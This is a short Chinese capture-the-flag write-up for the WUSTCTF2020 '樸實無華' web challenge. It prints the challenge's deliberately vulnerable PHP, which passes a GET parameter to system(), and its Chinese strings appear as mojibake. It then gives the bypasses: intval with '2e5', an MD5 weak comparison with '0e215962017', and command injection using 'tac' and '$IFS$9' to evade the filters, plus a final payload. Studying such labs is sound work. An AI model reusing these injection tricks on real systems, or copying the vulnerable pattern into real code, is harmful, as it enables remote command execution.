[WUSTCTF2020]樸實無華
阿新 • • 發佈:2020-09-10
掃描目錄 看到 robots.txt
訪問
在響應頭裡面找到了提示資訊
檢視
原始碼如下:
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "鎴戜笉緇忔剰闂寸湅浜嗙湅鎴戠殑鍔衝姏澹�, 涓嶆槸鎯崇湅鏃墮棿, 鍙槸鎯充笉緇忔剰闂�, 璁╀綘鐭ラ亾鎴戣繃寰楁瘮浣犲ソ.</br>"; }else{ die("閲戦挶瑙e喅涓嶄簡絀蜂漢鐨勬湰璐ㄩ棶棰�"); } }else{ die("鍘婚潪媧插惂"); } //level 2 if (isset($_GET['md5'])){ $md5=$_GET['md5']; if ($md5==md5($md5)) echo "鎯衝埌榪欎釜CTFer鎷垮埌flag鍚�, 鎰熸縺娑曢浂, 璺戝幓涓滄緶宀�, 鎵句竴瀹墮鍘�, 鎶婂帹甯堣槳鍑哄幓, 鑷繁鐐掍袱涓嬁鎵嬪皬鑿�, 鍊掍竴鏉暎瑁呯櫧閰�, 鑷村瘜鏈夐亾, 鍒灝忔毚.</br>"; else die("鎴戣刀鞝у枈鏉ユ垜鐨勯厭鑲夋湅鍙�, 浠栨墦浜嗕釜鐢佃瘽, 鎶婁粬涓€瀹跺畨鎺掑埌浜嗛潪媧�"); }else{ die("鍘婚潪媧插惂"); } //get flag if (isset($_GET['get_flag'])){ $get_flag = $_GET['get_flag']; if(!strstr($get_flag," ")){ $get_flag = str_ireplace("cat", "wctf2020", $get_flag); echo "鎯衝埌榪欓噷, 鎴戝厖瀹炶€屾鎱�, 鏈夐挶浜虹殑蹇箰寰€寰€灝辨槸榪欎箞鐨勬湸瀹炴棤鍗�, 涓旀灟鐕�.</br>"; system($get_flag); }else{ die("蹇埌闈炴床浜�"); } }else{ die("鍘婚潪媧插惂"); } ?>
首先繞過函式intval
echo(intval(2e5)) //2
echo(intval(2e5+1)) //200001
然後MD5
弱等於
0e215962017
然後get_flag
先ls看看有啥檔案
用tac 代替 cat 用 $IFS$9 代替空格
最後payload
payload=num=2e5&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag